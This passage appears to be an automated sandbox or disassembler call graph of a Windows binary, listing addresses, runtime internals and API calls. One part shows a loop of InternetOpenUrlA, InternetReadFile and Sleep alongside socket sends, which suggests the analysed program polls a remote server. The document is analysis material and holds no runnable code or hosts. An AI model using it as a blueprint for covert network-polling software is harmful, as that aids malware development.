calls 19306->19307 19308 2bdf540 19307->19308 19309 2bd4ed5 __write_nolock 9 API calls 19308->19309 19310 2bd8784 19309->19310 19310->19253 19310->19254 19311->19310 19312 2bd5e3b __chsize_nolock 59 API calls 19311->19312 19312->19308 19317 2bdf5a0 19313->19317 19314 2bdf5a4 19315 2bdf5a9 19314->19315 19316 2bd5e3b __chsize_nolock 59 API calls 19314->19316 19315->19261 19318 2bdf5d4 19316->19318 19317->19314 19317->19315 19320 2bdf5e3 19317->19320 19319 2bd4ed5 __write_nolock 9 API calls 19318->19319 19319->19315 19320->19315 19321 2bd5e3b __chsize_nolock 59 API calls 19320->19321 19321->19318 19323 2bdf4cb 19322->19323 19325 2bdf4bd 19322->19325 19324 2bd5e3b __chsize_nolock 59 API calls 19323->19324 19330 2bdf4d5 19324->19330 19325->19323 19327 2bdf4f7 19325->19327 19326 2bd4ed5 __write_nolock 9 API calls 19328 2bd8827 19326->19328 19327->19328 19329 2bd5e3b __chsize_nolock 59 API calls 19327->19329 19328->19254 19328->19268 19329->19330 19330->19326 19332 2be01d2 ___crtIsPackagedApp 19331->19332 19357 2bd4535 IsProcessorFeaturePresent 19356->19357 19358 2bd4533 19356->19358 19360 2bd956f 19357->19360 19358->19244 19392 2bd951e IsDebuggerPresent 19360->19392 19364 2bd8961 __mtinitlocknum 19363->19364 19365 2bd8980 19364->19365 19366 2bd86b3 __FF_MSGBANNER 59 API calls 19364->19366 19367 2bd8a94 __malloc_crt 59 API calls 19365->19367 19373 2bd89a3 __mtinitlocknum 19365->19373 19368 2bd896f 19366->19368 19369 2bd8997 19367->19369 19370 2bd8710 __NMSG_WRITE 59 API calls 19368->19370 19371 2bd89ad 19369->19371 19372 2bd899e 19369->19372 19374 2bd8976 19370->19374 19400 2bd88cd 19371->19400 19375 2bd5e3b __chsize_nolock 59 API calls 19372->19375 19373->19264 19377 2bd82fc __mtinitlocknum 3 API calls 19374->19377 19375->19373 19377->19365 19386 2bd86b3 __FF_MSGBANNER 59 API calls 19385->19386 19387 2bd8427 19386->19387 19393 2bd9533 ___raise_securityfailure 19392->19393 19398 2bd9508 SetUnhandledExceptionFilter UnhandledExceptionFilter 19393->19398 19395 2bd953b ___raise_securityfailure 19399 2bd94f3 GetCurrentProcess TerminateProcess 19395->19399 19397 2bd9558 19397->19244 19398->19395 19399->19397 19401 2bd88de 19400->19401 19402 2bd88f1 RtlEnterCriticalSection 19400->19402 19403 2bd8955 __mtinitlocknum 58 API calls 19401->19403 19441 2bd82f3 ExitProcess 19440->19441 19442 2bd82e1 GetProcAddress 19440->19442 19442->19441 19444 2bd91ab __getptd_noexit TlsGetValue 19443->19444 19445 2bd5c67 19444->19445 19446 2bd5cb5 SetLastError 19445->19446 19447 2bd8a4c __calloc_crt 56 API calls 19445->19447 19446->19281 19448 2bd5c7a 19447->19448 19448->19446 19449 2bd91ca __getptd_noexit TlsSetValue 19448->19449 19450 2bd5c8e 19449->19450 19451 2bd5cac 19450->19451 19452 2bd5c94 19450->19452 19454 2bd2f54 _free 56 API calls 19451->19454 19453 2bd5cc1 __initptd 56 API calls 19452->19453 19455 2bd5c9c GetCurrentThreadId 19453->19455 19456 2bd5cb2 19454->19456 19455->19446 19456->19446 19460 2bd8a37 RtlLeaveCriticalSection 19457->19460 19459 2bdb55d 19459->19065 19460->19459 19462 2bdb686 19461->19462 19466 2bdb6ea 19462->19466 19471 2be15b6 19462->19471 19464 2bdb607 19464->19084 19464->19087 19465 2be15b6 _parse_cmdline 59 API calls 19465->19466 19466->19464 19466->19465 19468 2bd527a 19467->19468 19469 2bd5273 19467->19469 19468->19079 19559 2bd55c7 19469->19559 19474 2be155c 19471->19474 19477 2bd225b 19474->19477 19478 2bd226c 19477->19478 19479 2bd22b9 19477->19479 19485 2bd5c3a 19478->19485 19479->19462 19482 2bd2299 19482->19479 19505 2bd5521 19482->19505 19486 2bd5c52 __getptd_noexit 59 API calls 19485->19486 19487 2bd5c40 19486->19487 19488 2bd2272 19487->19488 19489 2bd841f __amsg_exit 59 API calls 19487->19489 19488->19482 19490 2bd519f 19488->19490 19489->19488 19491 2bd51ab __mtinitlocknum 19490->19491 19492 2bd5c3a FindHandler 59 API calls 19491->19492 19493 2bd51b4 19492->19493 19494 2bd51e3 19493->19494 19496 2bd51c7 19493->19496 19495 2bd88cd __lock 59 API calls 19494->19495 19497 2bd51ea 19495->19497 19498 2bd5c3a FindHandler 59 API calls 19496->19498 19517 2bd521f 19497->19517 19503 2bd51cc 19498->19503 19506 2bd552d __mtinitlocknum 19505->19506 19507 2bd5c3a FindHandler 59 API calls 19506->19507 19508 2bd5537 19507->19508 19509 2bd5549 19508->19509 19510 2bd88cd __lock 59 API calls 19508->19510 19511 2bd5557 __mtinitlocknum 19509->19511 19513 2bd841f __amsg_exit 59 API calls 19509->19513 19515 2bd5567 19510->19515 19511->19479 19513->19511 19560 2bd55d3 __mtinitlocknum 19559->19560 19561 2bd5c3a FindHandler 59 API calls 19560->19561 19562 2bd55db 19561->19562 19563 2bd5521 __setmbcp 59 API calls 19562->19563 19564 2bd55e5 19563->19564 19584 2bd52c2 19564->19584 19567 2bd8a94 __malloc_crt 59 API calls 19568 2bd5607 19567->19568 19569 2bd5734 __mtinitlocknum 19568->19569 19591 2bd576f 19568->19591 19569->19468 19585 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 19584->19585 19586 2bd52d2 19585->19586 19587 2bd52e1 GetOEMCP 19586->19587 19588 2bd52f3 19586->19588 19589 2bd530a 19587->19589 19588->19589 19590 2bd52f8 GetACP 19588->19590 19589->19567 19589->19569 19590->19589 19592 2bd52c2 getSystemCP 61 API calls 19591->19592 19594 2bd578c 19592->19594 19593 2bd5793 setSBCS 19594->19593 19600 2bd5802 _memset __setmbcp_nolock 19594->19600 19672 2bd6ca7 19671->19672 19674 2bd6cb5 19671->19674 19672->19674 19678 2bd6ccb 19672->19678 19673 2bd5e3b __chsize_nolock 59 API calls 19675 2bd6cbc 19673->19675 19674->19673 19676 2bd4ed5 __write_nolock 9 API calls 19675->19676 19677 2bd6cc6 19676->19677 19677->19095 19678->19677 19679 2bd5e3b __chsize_nolock 59 API calls 19678->19679 19679->19675 19681 2bdd2c2 RtlEncodePointer 19680->19681 19681->19681 19682 2bdd2dc 19681->19682 19682->19107 19686 2bd3288 19683->19686 19687 2bd3294 __mtinitlocknum 19686->19687 19694 2bd8572 19687->19694 19750 2bd919f 19749->19750 19751 2bd91a3 TlsFree 19749->19751 19750->19113 19751->19113 19753 2be04a3 19752->19753 19757 2be04be 19752->19757 19754 2be04af 19753->19754 19753->19757 19755 2bd5e3b __chsize_nolock 58 API calls 19754->19755 19758 2be04b4 19755->19758 19756 2be04ce RtlAllocateHeap 19756->19757 19756->19758 19757->19756 19757->19758 19759 2bd81e3 _malloc RtlDecodePointer 19757->19759 19758->19161 19759->19757 19760->19163 19767 2bd8a37 RtlLeaveCriticalSection 19761->19767 19763 2bd5d24 19763->19173 19768 2bd8a37 RtlLeaveCriticalSection 19764->19768 19766 2bd5d72 19766->19176 19767->19763 19768->19766 19770 2bd5adb __mtinitlocknum 19769->19770 19771 2bd5af4 19770->19771 19772 2bd5be3 __mtinitlocknum 19770->19772 19773 2bd2f54 _free 59 API calls 19770->19773 19774 2bd5b03 19771->19774 19775 2bd2f54 _free 59 API calls 19771->19775 19772->19190 19773->19771 19776 2bd5b12 19774->19776 19778 2bd2f54 _free 59 API calls 19774->19778 19775->19774 19777 2bd5b21 19776->19777 19779 2bd2f54 _free 59 API calls 19776->19779 19780 2bd5b30 19777->19780 19781 2bd2f54 _free 59 API calls 19777->19781 19778->19776 19779->19777 19782 2bd5b3f 19780->19782 19783 2bd2f54 _free 59 API calls 19780->19783 19781->19780 19784 2bd5b4e 19782->19784 19786 2bd2f54 _free 59 API calls 19782->19786 19783->19782 19785 2bd5b60 19784->19785 19787 2bd2f54 _free 59 API calls 19784->19787 19788 2bd88cd __lock 59 API calls 19785->19788 19786->19784 19787->19785 19790 2bd5b68 19788->19790 19792 2bd2f54 _free 59 API calls 19790->19792 19794 2bd5b8b 19790->19794 19792->19794 19793 2bd88cd __lock 59 API calls 19798 2bd5b9f ___removelocaleref 19793->19798 19801 2bd5bef 19794->19801 19795 2bd5bd0 19804 2bd5bfb 19795->19804 19798->19795 19800 2bd4fa5 ___freetlocinfo 59 API calls 19798->19800 19799 2bd2f54 _free 59 API calls 19799->19772 19800->19795 19807 2bd8a37 RtlLeaveCriticalSection 19801->19807 19803 2bd5b98 19803->19793 19808 2bd8a37 RtlLeaveCriticalSection 19804->19808 19806 2bd5bdd 19806->19799 19807->19803 19808->19806 19809 4025d4 LoadLibraryExA 19810 40d169 19809->19810 19811 2bc72ab InternetOpenA 19812 2bc72c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19811->19812 19831 2bc66f4 _memset shared_ptr 19811->19831 19818 2bc7342 _memset 19812->19818 19813 2bc7322 InternetOpenUrlA 19814 2bc7382 InternetCloseHandle 19813->19814 19813->19818 19814->19831 19815 2bc6708 Sleep 19817 2bc670e RtlEnterCriticalSection RtlLeaveCriticalSection 19815->19817 19816 2bc7346 InternetReadFile 19816->19818 19819 2bc7377 InternetCloseHandle 19816->19819 19817->19831 19818->19813 19818->19816 19819->19814 19820 2bc73e9 RtlEnterCriticalSection RtlLeaveCriticalSection 19922 2bd231c 19820->19922 19822 2bd2f8c _malloc 59 API calls 19823 2bc749d RtlEnterCriticalSection RtlLeaveCriticalSection 19822->19823 19823->19831 19824 2bc776a RtlEnterCriticalSection RtlLeaveCriticalSection 19824->19831 19826 2bd231c 66 API calls 19826->19831 19829 2bc78e2 RtlEnterCriticalSection 19830 2bc790f RtlLeaveCriticalSection 19829->19830 19829->19831 19982 2bc3c67 19830->19982 19831->19811 19831->19815 19831->19817 19831->19820 19831->19822 19831->19824 19831->19826 19831->19829 19831->19830 19833 2bd2f8c 59 API calls _malloc 19831->19833 19834 2bd2f54 59 API calls _free 19831->19834 19843 2bca6fb 73 API calls 19831->19843 19846 2bd35c6 60 API calls _strtok 19831->19846 19850 2bc76ec Sleep 19831->19850 19851 2bc76e7 shared_ptr 19831->19851 19854 2bc5119 19831->19854 19883 2bcabe5 19831->19883 19893 2bc61f5 19831->19893 19896 2bc8311 19831->19896 19902 2bcd0ed 19831->19902 19907 2bc83c0 19831->19907 19915 2bc33b2 19831->19915 19932 2bd2830 19831->19932 19935 2bd3b2c 19831->19935 19943 2bc970d 19831->19943 19950 2bca825 19831->19950 19958 2bc4100 19831->19958 19962 2bd23f8 19831->19962 19973 2bc1ba7 19831->19973 19989 2bc3d7e 19831->19989 19996 2bc8fd9 19831->19996 20003 2bc534d 19831->20003 19833->19831 19834->19831 19843->19831 19846->19831 19954 2bd18d0 19850->19954 19851->19850 19855 2bc5123 __EH_prolog 19854->19855 20013 2bd0af0 19855->20013 19858 2bc3c67 72 API calls 19859 2bc514a 19858->19859 19860 2bc3d7e 64 API calls 19859->19860 19861 2bc5158 19860->19861 19862 2bc8311 89 API calls 19861->19862 19863 2bc516c 19862->19863 19864 2bc5322 shared_ptr 19863->19864 20017 2bca6fb 19863->20017 19864->19831 19867 2bc51c4 19869 2bca6fb 73 API calls 19867->19869 19868 2bc51f6 19870 2bca6fb 73 API calls 19868->19870 19871 2bc51d4 19869->19871 19872 2bc5207 19870->19872 19871->19864 19874 2bca6fb 73 API calls 19871->19874 19872->19864 19873 2bca6fb 73 API calls 19872->19873 19875 2bc524a 19873->19875 19876 2bc52b4 19874->19876 19875->19864 19877 2bca6fb 73 API calls 19875->19877 19876->19864 19878 2bca6fb 73 API calls 19876->19878 19877->19871 19879 2bc52da 19878->19879 19879->19864 19880 2bca6fb 73 API calls 19879->19880 19881 2bc5304 19880->19881 20022 2bcceaf 19881->20022 19884 2bcabef __EH_prolog 19883->19884 20073 2bcd0c4 19884->20073 19886 2bcac10 shared_ptr 20076 2bd20d0 19886->20076 19888 2bcac27 19889 2bcac3d 19888->19889 20082 2bc3fb0 19888->20082 19889->19831 19894 2bd2f8c _malloc 59 API calls 19893->19894 19895 2bc6208 19894->19895 19897 2bc8329 19896->19897 19898 2bc834a 19896->19898 20723 2bc95d3 19897->20723 19901 2bc836f 19898->19901 20726 2bc2ac7 19898->20726 19901->19831 19903 2bd0af0 Mailbox 68 API calls 19902->19903 19905 2bcd103 19903->19905 19904 2bcd1f1 19904->19831 19905->19904 19906 2bc2db5 73 API calls 19905->19906 19906->19905 19908 2bc83db WSASetLastError shutdown 19907->19908 19909 2bc83cb 19907->19909 19910 2bca4df 69 API calls 19908->19910 19911 2bd0af0 Mailbox 68 API calls 19909->19911 19912 2bc83f8 19910->19912 19913 2bc83d0 19911->19913 19912->19913 19914 2bd0af0 Mailbox 68 API calls 19912->19914 19913->19831 19914->19913 19916 2bc33c4 InterlockedCompareExchange 19915->19916 19917 2bc33e1 19915->19917 19916->19917 19918 2bc33d6 19916->19918 19919 2bc29ee 76 API calls 19917->19919 20816 2bc32ab 19918->20816 19921 2bc33f1 19919->19921 19921->19831 19925 2bd2328 19922->19925 19928 2bd234b 19922->19928 19924 2bd232e 19927 2bd5e3b __chsize_nolock 59 API calls 19924->19927 19925->19924 19925->19928 19926 2bd235e 19926->19831 19929 2bd2333 19927->19929 20869 2bd2363 19928->20869 19930 2bd4ed5 __write_nolock 9 API calls 19929->19930 19931 2bd233e 19930->19931 19931->19831 20879 2bd284e 19932->20879 19934 2bd2849 19934->19831 19937 2bd3b34 19935->19937 19936 2bd2f8c _malloc 59 API calls 19936->19937 19937->19936 19938 2bd3b4e 19937->19938 19939 2bd81e3 _malloc RtlDecodePointer 19937->19939 19940 2bd3b52 std::exception::exception 19937->19940 19938->19831 19939->19937 19941 2bd453a __CxxThrowException@8 RaiseException 19940->19941 19942 2bd3b7c 19941->19942 19944 2bc9717 __EH_prolog 19943->19944 19945 2bc1ba7 282 API calls 19944->19945 19946 2bc976c 19945->19946 19947 2bc9789 RtlEnterCriticalSection 19946->19947 19948 2bc97a4 19947->19948 19949 2bc97a7 RtlLeaveCriticalSection 19947->19949 19948->19949 19949->19831 19951 2bca82f __EH_prolog 19950->19951 20885 2bcdfd6 19951->20885 19953 2bca84d shared_ptr 19953->19831 19955 2bd18dd 19954->19955 19956 2bd1901 19954->19956 19955->19956 19957 2bd18f1 GetProcessHeap HeapFree 19955->19957 19956->19831 19957->19956 19959 2bc4118 19958->19959 19960 2bc4112 19958->19960 19959->19831 20889 2bca6d9 19960->20889 19963 2bd2429 19962->19963 19964 2bd2414 19962->19964 19963->19964 19965 2bd2430 19963->19965 19966 2bd5e3b __chsize_nolock 59 API calls 19964->19966 20891 2bd6030 19965->20891 19968 2bd2419 19966->19968 19970 2bd4ed5 __write_nolock 9 API calls 19968->19970 19971 2bd2424 19970->19971 19971->19831 21116 2be53d0 19973->21116 19975 2bc1bb1 RtlEnterCriticalSection 19976 2bc1be9 RtlLeaveCriticalSection 19975->19976 19978 2bc1bd1 19975->19978 21117 2bce306 19976->21117 19978->19976 19979 2bc1c55 RtlLeaveCriticalSection 19978->19979 19979->19831 19980 2bc1c22 19980->19979 19983 2bd0af0 Mailbox 68 API calls 19982->19983 19984 2bc3c7e 19983->19984 21174 2bc3ca2 19984->21174 19990 2bc3d99 htons 19989->19990 19991 2bc3dcb htons 19989->19991 19992 2bc3bd3 60 API calls 19990->19992 21220 2bc3c16 19991->21220 19994 2bc3db7 htonl htonl 19992->19994 19995 2bc3ded 19994->19995 19995->19831 19997 2bc8fe3 __EH_prolog 19996->19997 21226 2bc373f 19997->21226 19999 2bc8ffd RtlEnterCriticalSection 20001 2bc900c RtlLeaveCriticalSection 19999->20001 20002 2bc9046 20001->20002 20002->19831 20004 2bd2f8c _malloc 59 API calls 20003->20004 20005 2bc5362 SHGetSpecialFolderPathA 20004->20005 20006 2bc5378 20005->20006 21235 2bd3751 20006->21235 20010 2bc53dc 21251 2bd3a64 20010->21251 20012 2bc53e2 20012->19831 20014 2bd0b19 20013->20014 20015 2bc513d 20013->20015 20016 2bd3384 __cinit 68 API calls 20014->20016 20015->19858 20016->20015 20018 2bd0af0 Mailbox 68 API calls 20017->20018 20021 2bca715 20018->20021 20019 2bc519d 20019->19864 20019->19867 20019->19868 20021->20019 20027 2bc2db5 20021->20027 20023 2bd0af0 Mailbox 68 API calls 20022->20023 20024 2bccec9 20023->20024 20025 2bccfd8 20024->20025 20054 2bc2b95 20024->20054 20025->19864 20028 2bc2dca 20027->20028 20029 2bc2de4 20027->20029 20031 2bd0af0 Mailbox 68 API calls 20028->20031 20030 2bc2dfc 20029->20030 20032 2bc2def 20029->20032 20041 2bc2d39 WSASetLastError WSASend 20030->20041 20035 2bc2dcf 20031->20035 20034 2bd0af0 Mailbox 68 API calls 20032->20034 20034->20035 20035->20021 20036 2bc2e54 WSASetLastError select 20051 2bca4df 20036->20051 20038 2bd0af0 68 API calls Mailbox 20039 2bc2e0c 20038->20039 20039->20035 20039->20036 20039->20038 20040 2bc2d39 71 API calls 20039->20040 20040->20039 20042 2bca4df 69 API calls 20041->20042 20043 2bc2d6e 20042->20043 20044 2bc2d75 20043->20044 20045 2bc2d82 20043->20045 20046 2bd0af0 Mailbox 68 API calls 20044->20046 20047 2bd0af0 Mailbox 68 API calls 20045->20047 20049 2bc2d7a 20045->20049 20046->20049 20047->20049 20048 2bc2d9c 20048->20039 20049->20048 20050 2bd0af0 Mailbox 68 API calls 20049->20050 20050->20048 20052 2bd0af0 Mailbox 68 API calls 20051->20052 20053 2bca4eb WSAGetLastError 20052->20053 20053->20039 20055 2bc2bc7 20054->20055 20056 2bc2bb1 20054->20056 20058 2bc2bd2 20055->20058 20066 2bc2bdf 20055->20066 20057 2bd0af0 Mailbox 68 API calls 20056->20057 20062 2bc2bb6 20057->20062 20060 2bd0af0 Mailbox 68 API calls 20058->20060 20059 2bc2be2 WSASetLastError WSARecv 20061 2bca4df 69 API calls 20059->20061 20060->20062 20061->20066 20062->20024 20063 2bd0af0 68 API calls Mailbox 20063->20066 20064 2bc2d22 20069 2bc1996 20064->20069 20066->20059 20066->20062 20066->20063 20066->20064 20067 2bc2cbc WSASetLastError select 20066->20067 20068 2bca4df 69 API calls 20067->20068 20068->20066 20070 2bc19bb 20069->20070 20071 2bc199f 20069->20071 20070->20062 20072 2bd3384 __cinit 68 API calls 20071->20072 20072->20070 20095 2bce256 20073->20095 20075 2bcd0d6 20075->19886 20180 2bd3399 20076->20180 20079 2bd20f4 20079->19888 20080 2bd211d ResumeThread 20080->19888 20081 2bd2116 CloseHandle 20081->20080 20083 2bd0af0 Mailbox 68 API calls 20082->20083 20084 2bc3fb8 20083->20084 20694 2bc1815 20084->20694 20087 2bca661 20088 2bca66b __EH_prolog 20087->20088 20700 2bccc19 20088->20700 20093 2bd453a __CxxThrowException@8 RaiseException 20094 2bca69f 20093->20094 20096 2bce260 __EH_prolog 20095->20096 20101 2bc4030 20096->20101 20100 2bce28e 20100->20075 20113 2be53d0 20101->20113 20103 2bc403a GetProcessHeap RtlAllocateHeap 20104 2bc407c 20103->20104 20105 2bc4053 std::exception::exception 20103->20105 20104->20100 20107 2bc408a 20104->20107 20114 2bca6a0 20105->20114 20108 2bc4094 __EH_prolog 20107->20108 20161 2bca2bf 20108->20161 20113->20103 20115 2bca6aa __EH_prolog 20114->20115 20122 2bccc4f 20115->20122 20121 2bca6d8 20131 2bcd7af 20122->20131 20125 2bccc69 20153 2bcd7e7 20125->20153 20127 2bca6c7 20128 2bd453a 20127->20128 20129 2bd4559 RaiseException 20128->20129 20129->20121 20134 2bd24f3 20131->20134 20137 2bd2521 20134->20137 20138 2bca6b9 20137->20138 20139 2bd252f 20137->20139 20138->20125 20143 2bd25b7 20139->20143 20144 2bd2534 20143->20144 20145 2bd25c0 20143->20145 20144->20138 20147 2bd2579 20144->20147 20146 2bd2f54 _free 59 API calls 20145->20146 20146->20144 20148 2bd2585 _strlen 20147->20148 20151 2bd25aa 20147->20151 20149 2bd2f8c _malloc 59 API calls 20148->20149 20150 2bd2597 20149->20150 20150->20151 20152 2bd6c9c std::exception::_Copy_str 59 API calls 20150->20152 20151->20138 20152->20151 20154 2bcd7f1 __EH_prolog 20153->20154 20157 2bcb712 20154->20157 20156 2bcd828 Mailbox 20156->20127 20158 2bcb71c __EH_prolog 20157->20158 20159 2bd24f3 std::exception::exception 59 API calls 20158->20159 20160 2bcb72d Mailbox 20159->20160 20160->20156 20172 2bcb0d6 20161->20172 20164 2bc3fdc 20179 2be53d0 20164->20179 20166 2bc3fe6 CreateEventA 20167 2bc3ffd 20166->20167 20168 2bc400f 20166->20168 20169 2bc3fb0 Mailbox 68 API calls 20167->20169 20168->20100 20170 2bc4005 20169->20170 20171 2bca661 Mailbox 60 API calls 20170->20171 20171->20168 20173 2bc40c1 20172->20173 20174 2bcb0e2 20172->20174 20173->20164 20175 2bd3b2c _Allocate 60 API calls 20174->20175 20176 2bcb0f2 std::exception::exception 20174->20176 20175->20176 20176->20173 20177 2bd453a __CxxThrowException@8 RaiseException 20176->20177 20178 2bcfb07 20177->20178 20179->20166 20181 2bd33bb 20180->20181 20182 2bd33a7 20180->20182 20184 2bd8a4c __calloc_crt 59 API calls 20181->20184 20183 2bd5e3b __chsize_nolock 59 API calls 20182->20183 20185 2bd33ac 20183->20185 20186 2bd33c8 20184->20186 20187 2bd4ed5 __write_nolock 9 API calls 20185->20187 20188 2bd3419 20186->20188 20190 2bd5c3a FindHandler 59 API calls 20186->20190 20193 2bd20eb 20187->20193 20189 2bd2f54 _free 59 API calls 20188->20189 20191 2bd341f 20189->20191 20192 2bd33d5 20190->20192 20191->20193 20199 2bd5e1a 20191->20199 20194 2bd5cc1 __initptd 59 API calls 20192->20194 20193->20079 20193->20080 20193->20081 20196 2bd33de CreateThread 20194->20196 20196->20193 20198 2bd3411 GetLastError 20196->20198 20207 2bd34f9 20196->20207 20198->20188 20204 2bd5e07 20199->20204 20201 2bd5e23 __dosmaperr 20202 2bd5e3b __chsize_nolock 59 API calls 20201->20202 20203 2bd5e36 20202->20203 20203->20193 20205 2bd5c52 __getptd_noexit 59 API calls 20204->20205 20206 2bd5e0c 20205->20206 20206->20201 20208 2bd3502 __threadstartex@4 20207->20208 20209 2bd91ab __getptd_noexit TlsGetValue 20208->20209 20210 2bd3508 20209->20210 20211 2bd350f __threadstartex@4 20210->20211 20212 2bd353b 20210->20212 20214 2bd91ca __getptd_noexit TlsSetValue 20211->20214 20213 2bd5acf __freefls@4 59 API calls 20212->20213 20218 2bd3556 ___crtIsPackagedApp 20213->20218 20215 2bd351e 20214->20215 20216 2bd3524 GetLastError RtlExitUserThread 20215->20216 20217 2bd3531 GetCurrentThreadId 20215->20217 20216->20217 20217->20218 20219 2bd356a 20218->20219 20223 2bd34a1 20218->20223 20229 2bd3432 20219->20229 20224 2bd34aa LoadLibraryExW GetProcAddress 20223->20224 20225 2bd34e3 RtlDecodePointer 20223->20225 20226 2bd34cd RtlEncodePointer 20224->20226 20227 2bd34cc 20224->20227 20228 2bd34f3 20225->20228 20226->20225 20227->20219 20228->20219 20230 2bd343e __mtinitlocknum 20229->20230 20231 2bd5c3a FindHandler 59 API calls 20230->20231 20232 2bd3443 20231->20232 20239 2bd2140 20232->20239 20259 2bd15f0 20239->20259 20242 2bd2188 TlsSetValue 20243 2bd2190 20242->20243 20281 2bcdd57 20243->20281 20286 2bcdc67 20243->20286 20293 2bcdd8a 20243->20293 20244 2bd219e 20297 2bd1f10 20244->20297 20270 2bd1654 20259->20270 20260 2bd16d0 20262 2bd16e6 20260->20262 20264 2bd16e3 CloseHandle 20260->20264 20261 2bd166c 20263 2bd16ae ResetEvent 20261->20263 20267 2bd1685 OpenEventA 20261->20267 20309 2bd1bf0 20261->20309 20265 2bd452b __except_handler4 6 API calls 20262->20265 20269 2bd16b5 20263->20269 20264->20262 20268 2bd16fe 20265->20268 20266 2bd177c WaitForSingleObject 20266->20270 20272 2bd169f 20267->20272 20273 2bd16a7 20267->20273 20268->20242 20268->20243 20313 2bd1830 20269->20313 20270->20260 20270->20261 20270->20266 20274 2bd1750 CreateEventA 20270->20274 20278 2bd1bf0 GetCurrentProcessId 20270->20278 20280 2bd176e CloseHandle 20270->20280 20272->20273 20276 2bd16a4 CloseHandle 20272->20276 20273->20263 20273->20269 20274->20270 20275 2bd1682 20275->20267 20276->20273 20278->20270 20280->20270 20324 2bc7cd4 20281->20324 20530 2bcd39a 20286->20530 20289 2bd453a __CxxThrowException@8 RaiseException 20290 2bcdc89 20289->20290 20292 2bc44ab 94 API calls 20290->20292 20291 2bcdcbe 20291->20244 20292->20291 20294 2bcddac 20293->20294 20538 2bc4d86 20294->20538 20295 2bcddaf 20295->20244 20298 2bd1f49 TlsGetValue 20297->20298 20307 2bd1f41 Mailbox 20297->20307 20298->20307 20323 2bd0c50 20309->20323 20311 2bd1c42 GetCurrentProcessId 20312 2bd1c55 20311->20312 20312->20275 20316 2bd183f 20313->20316 20314 2bd16cd 20314->20260 20315 2bd18a3 SetEvent 20315->20314 20317 2bd1875 CreateEventA 20316->20317 20318 2bd1bf0 GetCurrentProcessId 20316->20318 20320 2bd1897 20316->20320 20319 2bd188b 20317->20319 20317->20320 20321 2bd1872 20318->20321 20319->20320 20322 2bd1890 CloseHandle 20319->20322 20320->20314 20320->20315 20321->20317 20322->20320 20323->20311 20398 2bc88ce 20324->20398 20326 2bc7cf3 20327 2bc4603 20326->20327 20399 2bc8957 20398->20399 20400 2bc88e3 20398->20400 20427 2bcfb36 20399->20427 20401 2bc8907 20400->20401 20402 2bc88f0 20400->20402 20420 2bc91f4 20401->20420 20410 2bc9101 20402->20410 20409 2bc8905 _memmove 20409->20326 20411 2bc88f8 20410->20411 20412 2bc9125 20410->20412 20415 2bc9130 20411->20415 20413 2bcfb36 std::bad_exception::bad_exception 60 API calls 20412->20413 20414 2bc912f 20413->20414 20416 2bc91a7 20415->20416 20419 2bc9141 _memmove 20415->20419 20417 2bcfb36 std::bad_exception::bad_exception 60 API calls 20416->20417 20418 2bc91b1 20417->20418 20419->20409 20421 2bc924c 20420->20421 20422 2bc9200 20420->20422 20423 2bcfb08 std::bad_exception::bad_exception 60 API calls 20421->20423 20424 2bc9aaf std::bad_exception::bad_exception 60 API calls 20422->20424 20426 2bc920e std::bad_exception::bad_exception 20422->20426 20425 2bc9256 20423->20425 20424->20426 20426->20409 20428 2bd24b3 std::exception::exception 59 API calls 20427->20428 20429 2bcfb4e 20428->20429 20430 2bd453a __CxxThrowException@8 RaiseException 20429->20430 20431 2bcfb63 20430->20431 20531 2bcd3a4 __EH_prolog 20530->20531 20534 2bcd4ea 20531->20534 20535 2bcd4f4 Mailbox __EH_prolog 20534->20535 20536 2bd24f3 std::exception::exception 59 API calls 20535->20536 20537 2bcd3d9 20536->20537 20537->20289 20539 2bc4d90 __EH_prolog 20538->20539 20540 2bd0af0 Mailbox 68 API calls 20539->20540 20541 2bc4da6 RtlEnterCriticalSection RtlLeaveCriticalSection 20540->20541 20542 2bc50d4 shared_ptr 20541->20542 20548 2bc4dd1 std::bad_exception::bad_exception 20541->20548 20542->20295 20544 2bc50a1 RtlEnterCriticalSection RtlLeaveCriticalSection 20545 2bc50b3 RtlEnterCriticalSection RtlLeaveCriticalSection 20544->20545 20545->20542 20545->20548 20546 2bca6fb 73 API calls 20546->20548 20547 2bc7cfa 60 API calls 20547->20548 20548->20544 20548->20545 20548->20546 20548->20547 20549 2bc4e8d RtlEnterCriticalSection RtlLeaveCriticalSection 20548->20549 20550 2bc4e9f RtlEnterCriticalSection RtlLeaveCriticalSection 20548->20550 20551 2bcceaf 73 API calls 20548->20551 20553 2bc7cd4 std::bad_exception::bad_exception 60 API calls 20548->20553 20556 2bd18d0 2 API calls 20548->20556 20557 2bc4100 2 API calls 20548->20557 20558 2bc4bed 20548->20558 20582 2bca988 20548->20582 20594 2bcaa60 20548->20594 20606 2bccfe1 20548->20606 20549->20550 20550->20548 20551->20548 20553->20548 20556->20548 20557->20548 20559 2bc4bf7 __EH_prolog 20558->20559 20560 2bc1ba7 283 API calls 20559->20560 20561 2bc4c31 20560->20561 20583 2bca992 __EH_prolog 20582->20583 20584 2bc7cd4 std::bad_exception::bad_exception 60 API calls 20583->20584 20585 2bca9ae 20584->20585 20595 2bcaa6a __EH_prolog 20594->20595 20676 2bcd06c 20595->20676 20608 2bccfeb __EH_prolog 20606->20608 20607 2bcd014 20610 2bcd059 20607->20610 20682 2bc886d 20607->20682 20608->20607 20609 2bc91f4 std::bad_exception::bad_exception 60 API calls 20608->20609 20609->20607 20610->20548 20677 2bcc4e1 60 API calls 20676->20677 20697 2bd24b3 20694->20697 20698 2bd2579 std::exception::_Copy_str 59 API calls 20697->20698 20699 2bc182a 20698->20699 20699->20087 20706 2bcd6e0 20700->20706 20703 2bccc33 20715 2bcd718 20703->20715 20705 2bca68e 20705->20093 20709 2bcb204 20706->20709 20710 2bcb20e __EH_prolog 20709->20710 20711 2bd24f3 std::exception::exception 59 API calls 20710->20711 20712 2bcb21f 20711->20712 20713 2bc7cd4 std::bad_exception::bad_exception 60 API calls 20712->20713 20714 2bca680 20713->20714 20714->20703 20716 2bcd722 __EH_prolog 20715->20716 20719 2bcb5fc 20716->20719 20718 2bcd759 Mailbox 20718->20705 20720 2bcb606 __EH_prolog 20719->20720 20721 2bcb204 std::bad_exception::bad_exception 60 API calls 20720->20721 20722 2bcb617 Mailbox 20721->20722 20722->20718 20744 2bc353e 20723->20744 20727 2bc2ae8 WSASetLastError connect 20726->20727 20728 2bc2ad8 20726->20728 20730 2bca4df 69 API calls 20727->20730 20729 2bd0af0 Mailbox 68 API calls 20728->20729 20731 2bc2add 20729->20731 20732 2bc2b07 20730->20732 20733 